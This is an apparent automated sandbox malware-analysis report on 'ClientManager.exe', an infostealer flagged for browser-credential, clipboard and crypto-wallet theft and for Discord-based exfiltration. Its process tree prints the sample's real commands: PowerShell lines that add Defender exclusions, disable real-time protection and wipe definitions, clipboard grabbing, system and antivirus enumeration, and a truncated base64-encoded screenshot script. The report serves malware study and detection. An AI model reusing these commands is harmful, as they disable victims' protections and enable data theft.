da4c3f0ca923ed1b61e543ad7614b4209b4dd3b9a4ff22040692ff3ced495971

Analysis

max time kernel
34s
max time network
35s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-11-2024 17:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ClientManager.exe
Size

8.3MB
MD5

bce67bdf63565f8bbb30c38a6d9b4fed
SHA1

c8e2168fd2e98e73101ad241c29ca00275d8a8ed
SHA256

da4c3f0ca923ed1b61e543ad7614b4209b4dd3b9a4ff22040692ff3ced495971
SHA512

6e48117514e6fa71f7e5990895c51ddfdd4f49f8eb7182e2c4874401c276a1f7f24f1f1c1ad83876e59dfa26d4f10cffda200c72194e2e0dba0e5a6dc5b98f3d
SSDEEP

196608:7TggVE3zwfI9jUC2gYBYv3vbWEQd+iITx1U6ns:wgVE3AIH2gYBgDWRMTnzs

Score

8^/10

collection credential_access defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1520	powershell.exe
3100	powershell.exe
1824	powershell.exe
1012	powershell.exe
1228	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	ClientManager.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1828	cmd.exe
900	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4944	rar.exe

Loads dropped DLL 18 IoCs

pid	Process
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe
2864	ClientManager.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
31	discord.com
32	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
15	ip-api.com
29	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
1700	tasklist.exe
3108	tasklist.exe
2044	tasklist.exe
4660	tasklist.exe
4736	tasklist.exe

UPX packed file 57 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023d01-63.dat	upx
behavioral2/memory/2864-67-0x00007FFD68160000-0x00007FFD68825000-memory.dmp	upx
behavioral2/files/0x0007000000023ccd-69.dat	upx
behavioral2/files/0x0007000000023cff-73.dat	upx
behavioral2/memory/2864-127-0x00007FFD80B70000-0x00007FFD80B7F000-memory.dmp	upx
behavioral2/files/0x0007000000023cd2-126.dat	upx
behavioral2/files/0x0007000000023cd0-124.dat	upx
behavioral2/files/0x0007000000023cd1-125.dat	upx
behavioral2/files/0x0007000000023ccf-123.dat	upx
behavioral2/files/0x0007000000023cce-122.dat	upx
behavioral2/files/0x0007000000023ccc-121.dat	upx
behavioral2/files/0x0007000000023d07-120.dat	upx
behavioral2/files/0x0007000000023d05-119.dat	upx
behavioral2/files/0x0007000000023d04-118.dat	upx
behavioral2/files/0x0007000000023d00-115.dat	upx
behavioral2/files/0x0007000000023cfe-114.dat	upx
behavioral2/memory/2864-72-0x00007FFD7B1F0000-0x00007FFD7B215000-memory.dmp	upx
behavioral2/memory/2864-132-0x00007FFD76C00000-0x00007FFD76C2D000-memory.dmp	upx
behavioral2/memory/2864-133-0x00007FFD76B80000-0x00007FFD76B9A000-memory.dmp	upx
behavioral2/memory/2864-134-0x00007FFD76B50000-0x00007FFD76B74000-memory.dmp	upx
behavioral2/memory/2864-135-0x00007FFD67BE0000-0x00007FFD67D5F000-memory.dmp	upx
behavioral2/memory/2864-136-0x00007FFD7EF60000-0x00007FFD7EF79000-memory.dmp	upx
behavioral2/memory/2864-137-0x00007FFD7B1B0000-0x00007FFD7B1BD000-memory.dmp	upx
behavioral2/memory/2864-138-0x00007FFD77810000-0x00007FFD77843000-memory.dmp	upx
behavioral2/memory/2864-140-0x00007FFD76DB0000-0x00007FFD76E7E000-memory.dmp	upx
behavioral2/memory/2864-139-0x00007FFD68160000-0x00007FFD68825000-memory.dmp	upx
behavioral2/memory/2864-143-0x00007FFD7B1F0000-0x00007FFD7B215000-memory.dmp	upx
behavioral2/memory/2864-142-0x00007FFD676A0000-0x00007FFD67BD3000-memory.dmp	upx
behavioral2/memory/2864-144-0x00007FFD777F0000-0x00007FFD77804000-memory.dmp	upx
behavioral2/memory/2864-146-0x00007FFD777E0000-0x00007FFD777ED000-memory.dmp	upx
behavioral2/memory/2864-145-0x00007FFD76C00000-0x00007FFD76C2D000-memory.dmp	upx
behavioral2/memory/2864-147-0x00007FFD76C90000-0x00007FFD76DAA000-memory.dmp	upx
behavioral2/memory/2864-171-0x00007FFD76B50000-0x00007FFD76B74000-memory.dmp	upx
behavioral2/memory/2864-184-0x00007FFD67BE0000-0x00007FFD67D5F000-memory.dmp	upx
behavioral2/memory/2864-360-0x00007FFD7B1B0000-0x00007FFD7B1BD000-memory.dmp	upx
behavioral2/memory/2864-362-0x00007FFD77810000-0x00007FFD77843000-memory.dmp	upx
behavioral2/memory/2864-365-0x00007FFD76DB0000-0x00007FFD76E7E000-memory.dmp	upx
behavioral2/memory/2864-372-0x00007FFD676A0000-0x00007FFD67BD3000-memory.dmp	upx
behavioral2/memory/2864-394-0x00007FFD67BE0000-0x00007FFD67D5F000-memory.dmp	upx
behavioral2/memory/2864-402-0x00007FFD76C90000-0x00007FFD76DAA000-memory.dmp	upx
behavioral2/memory/2864-388-0x00007FFD68160000-0x00007FFD68825000-memory.dmp	upx
behavioral2/memory/2864-389-0x00007FFD7B1F0000-0x00007FFD7B215000-memory.dmp	upx
behavioral2/memory/2864-403-0x00007FFD68160000-0x00007FFD68825000-memory.dmp	upx
behavioral2/memory/2864-423-0x00007FFD76B50000-0x00007FFD76B74000-memory.dmp	upx
behavioral2/memory/2864-422-0x00007FFD76B80000-0x00007FFD76B9A000-memory.dmp	upx
behavioral2/memory/2864-421-0x00007FFD76C00000-0x00007FFD76C2D000-memory.dmp	upx
behavioral2/memory/2864-420-0x00007FFD80B70000-0x00007FFD80B7F000-memory.dmp	upx
behavioral2/memory/2864-419-0x00007FFD7B1F0000-0x00007FFD7B215000-memory.dmp	upx
behavioral2/memory/2864-418-0x00007FFD676A0000-0x00007FFD67BD3000-memory.dmp	upx
behavioral2/memory/2864-417-0x00007FFD76C90000-0x00007FFD76DAA000-memory.dmp	upx
behavioral2/memory/2864-416-0x00007FFD777E0000-0x00007FFD777ED000-memory.dmp	upx
behavioral2/memory/2864-415-0x00007FFD777F0000-0x00007FFD77804000-memory.dmp	upx
behavioral2/memory/2864-413-0x00007FFD76DB0000-0x00007FFD76E7E000-memory.dmp	upx
behavioral2/memory/2864-412-0x00007FFD77810000-0x00007FFD77843000-memory.dmp	upx
behavioral2/memory/2864-411-0x00007FFD7B1B0000-0x00007FFD7B1BD000-memory.dmp	upx
behavioral2/memory/2864-410-0x00007FFD7EF60000-0x00007FFD7EF79000-memory.dmp	upx
behavioral2/memory/2864-409-0x00007FFD67BE0000-0x00007FFD67D5F000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2040	WMIC.exe
3196	WMIC.exe
3872	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4552	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
1520	powershell.exe
1824	powershell.exe
1824	powershell.exe
1520	powershell.exe
3100	powershell.exe
3100	powershell.exe
900	powershell.exe
900	powershell.exe
900	powershell.exe
1352	powershell.exe
1352	powershell.exe
1352	powershell.exe
1012	powershell.exe
1012	powershell.exe
100	powershell.exe
100	powershell.exe
1228	powershell.exe
1228	powershell.exe
3512	powershell.exe
3512	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4660	tasklist.exe
Token: SeIncreaseQuotaPrivilege	1312	WMIC.exe
Token: SeSecurityPrivilege	1312	WMIC.exe
Token: SeTakeOwnershipPrivilege	1312	WMIC.exe
Token: SeLoadDriverPrivilege	1312	WMIC.exe
Token: SeSystemProfilePrivilege	1312	WMIC.exe
Token: SeSystemtimePrivilege	1312	WMIC.exe
Token: SeProfSingleProcessPrivilege	1312	WMIC.exe
Token: SeIncBasePriorityPrivilege	1312	WMIC.exe
Token: SeCreatePagefilePrivilege	1312	WMIC.exe
Token: SeBackupPrivilege	1312	WMIC.exe
Token: SeRestorePrivilege	1312	WMIC.exe
Token: SeShutdownPrivilege	1312	WMIC.exe
Token: SeDebugPrivilege	1312	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1312	WMIC.exe
Token: SeRemoteShutdownPrivilege	1312	WMIC.exe
Token: SeUndockPrivilege	1312	WMIC.exe
Token: SeManageVolumePrivilege	1312	WMIC.exe
Token: 33	1312	WMIC.exe
Token: 34	1312	WMIC.exe
Token: 35	1312	WMIC.exe
Token: 36	1312	WMIC.exe
Token: SeDebugPrivilege	1520	powershell.exe
Token: SeIncreaseQuotaPrivilege	1312	WMIC.exe
Token: SeSecurityPrivilege	1312	WMIC.exe
Token: SeTakeOwnershipPrivilege	1312	WMIC.exe
Token: SeLoadDriverPrivilege	1312	WMIC.exe
Token: SeSystemProfilePrivilege	1312	WMIC.exe
Token: SeSystemtimePrivilege	1312	WMIC.exe
Token: SeProfSingleProcessPrivilege	1312	WMIC.exe
Token: SeIncBasePriorityPrivilege	1312	WMIC.exe
Token: SeCreatePagefilePrivilege	1312	WMIC.exe
Token: SeBackupPrivilege	1312	WMIC.exe
Token: SeRestorePrivilege	1312	WMIC.exe
Token: SeShutdownPrivilege	1312	WMIC.exe
Token: SeDebugPrivilege	1312	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1312	WMIC.exe
Token: SeRemoteShutdownPrivilege	1312	WMIC.exe
Token: SeUndockPrivilege	1312	WMIC.exe
Token: SeManageVolumePrivilege	1312	WMIC.exe
Token: 33	1312	WMIC.exe
Token: 34	1312	WMIC.exe
Token: 35	1312	WMIC.exe
Token: 36	1312	WMIC.exe
Token: SeDebugPrivilege	1824	powershell.exe
Token: SeIncreaseQuotaPrivilege	3872	WMIC.exe
Token: SeSecurityPrivilege	3872	WMIC.exe
Token: SeTakeOwnershipPrivilege	3872	WMIC.exe
Token: SeLoadDriverPrivilege	3872	WMIC.exe
Token: SeSystemProfilePrivilege	3872	WMIC.exe
Token: SeSystemtimePrivilege	3872	WMIC.exe
Token: SeProfSingleProcessPrivilege	3872	WMIC.exe
Token: SeIncBasePriorityPrivilege	3872	WMIC.exe
Token: SeCreatePagefilePrivilege	3872	WMIC.exe
Token: SeBackupPrivilege	3872	WMIC.exe
Token: SeRestorePrivilege	3872	WMIC.exe
Token: SeShutdownPrivilege	3872	WMIC.exe
Token: SeDebugPrivilege	3872	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3872	WMIC.exe
Token: SeRemoteShutdownPrivilege	3872	WMIC.exe
Token: SeUndockPrivilege	3872	WMIC.exe
Token: SeManageVolumePrivilege	3872	WMIC.exe
Token: 33	3872	WMIC.exe
Token: 34	3872	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3292 wrote to memory of 2864	3292	ClientManager.exe	83
PID 3292 wrote to memory of 2864	3292	ClientManager.exe	83
PID 2864 wrote to memory of 1844	2864	ClientManager.exe	84
PID 2864 wrote to memory of 1844	2864	ClientManager.exe	84
PID 2864 wrote to memory of 4768	2864	ClientManager.exe	85
PID 2864 wrote to memory of 4768	2864	ClientManager.exe	85
PID 2864 wrote to memory of 2880	2864	ClientManager.exe	86
PID 2864 wrote to memory of 2880	2864	ClientManager.exe	86
PID 2864 wrote to memory of 3600	2864	ClientManager.exe	90
PID 2864 wrote to memory of 3600	2864	ClientManager.exe	90
PID 3600 wrote to memory of 4660	3600	cmd.exe	91
PID 3600 wrote to memory of 4660	3600	cmd.exe	91
PID 2864 wrote to memory of 2176	2864	ClientManager.exe	92
PID 2864 wrote to memory of 2176	2864	ClientManager.exe	92
PID 2176 wrote to memory of 1312	2176	cmd.exe	93
PID 2176 wrote to memory of 1312	2176	cmd.exe	93
PID 4768 wrote to memory of 1824	4768	cmd.exe	94
PID 4768 wrote to memory of 1824	4768	cmd.exe	94
PID 1844 wrote to memory of 1520	1844	cmd.exe	95
PID 1844 wrote to memory of 1520	1844	cmd.exe	95
PID 2880 wrote to memory of 552	2880	cmd.exe	96
PID 2880 wrote to memory of 552	2880	cmd.exe	96
PID 2864 wrote to memory of 1652	2864	ClientManager.exe	98
PID 2864 wrote to memory of 1652	2864	ClientManager.exe	98
PID 1652 wrote to memory of 1516	1652	cmd.exe	99
PID 1652 wrote to memory of 1516	1652	cmd.exe	99
PID 2864 wrote to memory of 4252	2864	ClientManager.exe	100
PID 2864 wrote to memory of 4252	2864	ClientManager.exe	100
PID 4252 wrote to memory of 2044	4252	cmd.exe	138
PID 4252 wrote to memory of 2044	4252	cmd.exe	138
PID 2864 wrote to memory of 1900	2864	ClientManager.exe	102
PID 2864 wrote to memory of 1900	2864	ClientManager.exe	102
PID 1900 wrote to memory of 3872	1900	cmd.exe	103
PID 1900 wrote to memory of 3872	1900	cmd.exe	103
PID 2864 wrote to memory of 464	2864	ClientManager.exe	104
PID 2864 wrote to memory of 464	2864	ClientManager.exe	104
PID 464 wrote to memory of 2040	464	cmd.exe	105
PID 464 wrote to memory of 2040	464	cmd.exe	105
PID 2864 wrote to memory of 1608	2864	ClientManager.exe	106
PID 2864 wrote to memory of 1608	2864	ClientManager.exe	106
PID 1608 wrote to memory of 3100	1608	cmd.exe	108
PID 1608 wrote to memory of 3100	1608	cmd.exe	108
PID 2864 wrote to memory of 208	2864	ClientManager.exe	109
PID 2864 wrote to memory of 208	2864	ClientManager.exe	109
PID 2864 wrote to memory of 904	2864	ClientManager.exe	110
PID 2864 wrote to memory of 904	2864	ClientManager.exe	110
PID 904 wrote to memory of 4736	904	cmd.exe	111
PID 904 wrote to memory of 4736	904	cmd.exe	111
PID 208 wrote to memory of 1700	208	cmd.exe	112
PID 208 wrote to memory of 1700	208	cmd.exe	112
PID 2864 wrote to memory of 2400	2864	ClientManager.exe	113
PID 2864 wrote to memory of 2400	2864	ClientManager.exe	113
PID 2400 wrote to memory of 3016	2400	cmd.exe	114
PID 2400 wrote to memory of 3016	2400	cmd.exe	114
PID 2864 wrote to memory of 1828	2864	ClientManager.exe	115
PID 2864 wrote to memory of 1828	2864	ClientManager.exe	115
PID 2864 wrote to memory of 2116	2864	ClientManager.exe	116
PID 2864 wrote to memory of 2116	2864	ClientManager.exe	116
PID 2864 wrote to memory of 3712	2864	ClientManager.exe	117
PID 2864 wrote to memory of 3712	2864	ClientManager.exe	117
PID 1828 wrote to memory of 900	1828	cmd.exe	118
PID 1828 wrote to memory of 900	1828	cmd.exe	118
PID 2116 wrote to memory of 3108	2116	cmd.exe	119
PID 2116 wrote to memory of 3108	2116	cmd.exe	119

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4108	attrib.exe
3508	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ClientManager.exe
"C:\Users\Admin\AppData\Local\Temp\ClientManager.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3292
- C:\Users\Admin\AppData\Local\Temp\ClientManager.exe
  "C:\Users\Admin\AppData\Local\Temp\ClientManager.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ClientManager.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ClientManager.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4768
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldnt fetch API.', 0, '404', 32+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2880
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Couldnt fetch API.', 0, '404', 32+16);close()"
      4⤵
      PID:552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3600
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2176
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1652
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:1516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4252
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:464
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2040
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1608
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:208
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:904
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2400
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1828
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2116
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3712
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:2984
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3692
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmA